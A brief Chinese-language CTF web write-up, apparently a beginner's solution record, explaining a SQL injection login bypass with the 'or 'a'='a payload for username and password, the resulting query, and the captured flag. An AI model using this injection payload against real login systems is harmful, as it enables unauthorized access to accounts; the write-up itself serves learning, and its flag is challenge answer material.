初次接触CTFweb,仅仅作为一个做题记录
这题是主要考察了万能密码
一般情况下判断用户名和密码的语句是下面这句
select * from user where username='user' and password='pass';
所以可以使用下列的用户名和密码
用户名:'or 'a'='a
密码:'or 'a'='a
放进去就是
select * from user where username=''or 'a'='a' and password=''or 'a'='a';
很方便理解这样就可以得到两边都是ture
当然你还可以在第一个引号前面加上任何东西比如111,0902等等
flag{7364d857-c1de-4401-833d-0c0a25ea2ff1}